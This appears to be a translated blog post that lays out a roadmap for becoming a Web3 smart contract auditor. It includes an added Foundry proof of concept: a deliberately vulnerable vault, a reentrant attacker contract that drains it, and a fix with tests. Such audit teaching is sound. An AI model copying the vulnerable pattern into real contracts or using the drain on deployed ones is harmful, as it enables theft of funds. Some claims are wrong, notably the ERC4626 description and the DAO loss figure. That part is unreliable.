
How to become a Web3 Smart Contract Auditor

2023-04-04 14:00
Original article author: 0xNorman


In this blog, we will explore how to become a professional smart contract auditor from scratch. Our goal is to provide an easy-to-understand and professional guide for developers interested in working in the security field as well as the general public.



Why is blockchain security so important?


Blockchain technology is decentralized, immutable and transparent, which gives it broad application prospects in finance, the Internet of Things, supply chains and other fields. However, as blockchain technology is adopted more widely, its security problems have become increasingly prominent. Smart contracts are a core component of any blockchain, and their security is crucial to the stable operation of the whole system. The DAO attack, in which $150 million worth of ether was stolen because of a flaw in a smart contract, is a prime example. Becoming a smart contract auditor therefore lets you contribute to the blockchain industry while also earning high financial rewards.


Learn programming and Solidity


If you don't already know how to program, it's best to learn Solidity directly. CryptoZombies is a good tutorial to get you started.


Attend training camps and competitions


Attend the Secureum BootCamp, complete its quizzes and enter the monthly contests to test your knowledge to the fullest. In the meantime, you can also learn Solidity and Ethereum security hands-on by playing Capture the Flag challenges such as Damn Vulnerable DeFi, Ethernaut and Capture The Ether.


Deploy and test smart contracts


Deploy and test smart contracts on a test network. You can write, deploy and test Solidity code online with the Remix IDE, and work through the examples on the Solidity by Example website in parallel. In addition, practice with popular development frameworks such as Hardhat and Foundry. These tools are very important for writing a PoC (Proof of Concept) during an audit. A PoC is a way to verify that a vulnerability exists and to measure its impact; it usually takes the form of test cases against the target smart contract that simulate the behavior of a potential attacker. This way, you can be sure that your findings are conclusive and you can quantify the potential impact. To create an effective PoC, write test cases that suit the type of vulnerability you found: this might mean interacting with the target contract to trigger unusual behavior, checking for the expected state changes, or attempting to replicate a known attack. Once your test case has demonstrated that the vulnerability exists, you can submit it along with your other audit findings to help clients understand and resolve the issue.
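As an added illustration of what such a PoC looks like in Foundry (this is not code from the original article): a hypothetical vault with a reentrancy bug, the same vault fixed with checks-effects-interactions, and a test that both quantifies the impact for the report and serves as a regression check for the fix. All contract, function and test names are assumptions.

```solidity
pragma solidity ^0.8.19;

import "forge-std/Test.sol";

interface IVault { function deposit() external payable; function withdraw() external; }

// Hypothetical audit target: pays out before it updates the caller's balance.
contract VulnerableVault is IVault {
    mapping(address => uint256) public balances;
    function deposit() external payable { balances[msg.sender] += msg.value; }
    function withdraw() external {
        uint256 amount = balances[msg.sender];
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "send failed");
        balances[msg.sender] = 0;  // effect after interaction: the finding
    }
}

// The fix: checks-effects-interactions, balance zeroed before the external call.
contract FixedVault is IVault {
    mapping(address => uint256) public balances;
    function deposit() external payable { balances[msg.sender] += msg.value; }
    function withdraw() external {
        uint256 amount = balances[msg.sender];
        balances[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "send failed");
    }
}

// PoC helper that plays the attacker's role: re-enters withdraw() from receive()
// while the vault still holds enough ETH to pay out again.
contract ReentrantCaller {
    IVault public immutable vault;
    constructor(IVault v) { vault = v; }
    function run() external payable { vault.deposit{value: msg.value}(); vault.withdraw(); }
    receive() external payable {
        if (msg.value > 0 && address(vault).balance >= msg.value) vault.withdraw();
    }
}

contract VaultPoCTest is Test {
    // Returns how much ETH the caller obtained beyond its own 1 ETH deposit.
    function _attempt(IVault vault) internal returns (uint256) {
        vm.deal(address(vault), 10 ether);  // constructed: other users' deposits
        ReentrantCaller c = new ReentrantCaller(vault);
        c.run{value: 1 ether}();
        return address(c).balance - 1 ether;
    }
    function testVulnerableVaultIsDrained() public { assertEq(_attempt(new VulnerableVault()), 10 ether); }
    function testFixedVaultKeepsFunds() public { assertEq(_attempt(new FixedVault()), 0); }
}
```

The first test's assertion is the quantified impact that goes into the report; the second demonstrates to the client that the proposed fix closes the issue.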


Familiar with ERC standards and decentralized financial protocols


Be familiar with popular ERC standards: ERC20 (general-purpose tradable tokens such as USDT and DAI), ERC721 (non-fungible tokens, i.e. NFTs, such as CryptoKitties), ERC777 (an improved ERC20 standard that supports operations by the recipient's contract), ERC1155 (a multi-token standard that lets a single contract manage several tokens), and ERC4626 (a proposal for Ethereum pre-licensed payments). Also learn about decentralized finance protocols such as Uniswap, a decentralized exchange that lets users swap tokens without trusting a third party, and Compound, a decentralized lending platform that lets users borrow cryptocurrencies. These contracts and protocols are widely used in real-world projects, so auditors must understand how they work and how they are implemented.


Learn token economics and business logic


Understanding token economics is important for smart contract auditors because it helps you grasp the economic dynamics and logic behind the actual business. By learning how to design and analyze a token economy model, you will better understand what a smart contract is designed for and where its potential problems lie. To learn about token economics, read blogs, websites and research reports on the subject. For example, the Token Economy blog provides in-depth articles on the token economy, covering token design, value capture, distribution and incentives. In addition, you can follow websites such as CoinGecko and CoinMarketCap for market behavior and fundamental analysis of various cryptocurrencies.


Practical experience


Get hands-on experience with Sherlock and Code4rena, and get certified to gain access to private audits. You can also apply to join yAcademy to learn from top auditors. Look for security issues in real projects by participating in Immunefi's bug bounty programs or Code4rena's audit contests.


Keep reading audit reports and vulnerability analysis


Read audit reports from Code4rena and from top audit firms such as OpenZeppelin, Trail of Bits, Consensys and SlowMist to build your own vulnerability data set. Read recent vulnerability analyses (such as that of the Euler Finance hack) to stay up to date on security incidents and attack techniques.


Build a personal brand and network


Build your brand by ranking on the Code4rena (C4) leaderboard, conducting private audits and working with clients, and contributing to the security community. At the same time, take an active part in community discussions and events to share your knowledge and experience and enhance your personal reputation.


Additional content: learn Huff (EVM assembly), become familiar with the EVM, and contribute to open source auditing tools


An in-depth understanding of the underlying technology helps you audit smart contracts more thoroughly. Learning Huff, an EVM assembly language, will give you a deeper understanding of how the EVM (Ethereum Virtual Machine) works. In addition, contributing to open source auditing tools such as Slither and Echidna can increase your technical capabilities and influence in the security field, as well as help you connect with industry experts and expand your network. Formal verification is a powerful tool that helps auditors ensure that smart contracts are secure and correct. It uses mathematical methods to verify that contract behavior conforms to its expected specification. Certora is a platform that provides formal verification services to help auditors automatically identify potential security vulnerabilities and functional bugs. By incorporating formal verification into the audit process, you can improve audit quality, reduce human error, and build client trust in the audit results.


Q&A


How to keep up with the latest developments in the security field?


Follow announcements on Twitter in real time, or, if you only want to read one roundup per week, subscribe to the BlockThreat newsletter by iphelix.


How much do auditors get paid?


While I'm not an expert, I think the hourly rate for auditors is something like this:

Beginner: $100 / hour

Experienced: $100-$250 / hour

Top auditor: $250-$1000 / hour


I've divided compensation into two categories:


Fixed rate: You are paid at a fixed (hourly) rate


Skills-based pay: The more bugs you find or the more serious they are, the more you get paid.


If you are a junior auditor, I recommend joining an audit firm. If you're at the other end of the skill curve, the skills-based pay model is more lucrative. It's important to note that top bug bounty hunters can earn much higher payouts, amounting to millions of dollars, for finding critical bugs. Follow the roadmap in this blog and you will be on your way to becoming a successful smart contract auditor. Along the way, you will not only learn to identify and guard against security vulnerabilities, but also be able to contribute to the security and sustainable development of the blockchain industry. Remember, don't get caught up in self-DoS and endless tutorial loops: you'll only really learn by doing. Best of luck in your career as a smart contract auditor!


This article is from submission and does not represent the views of BlockBeats



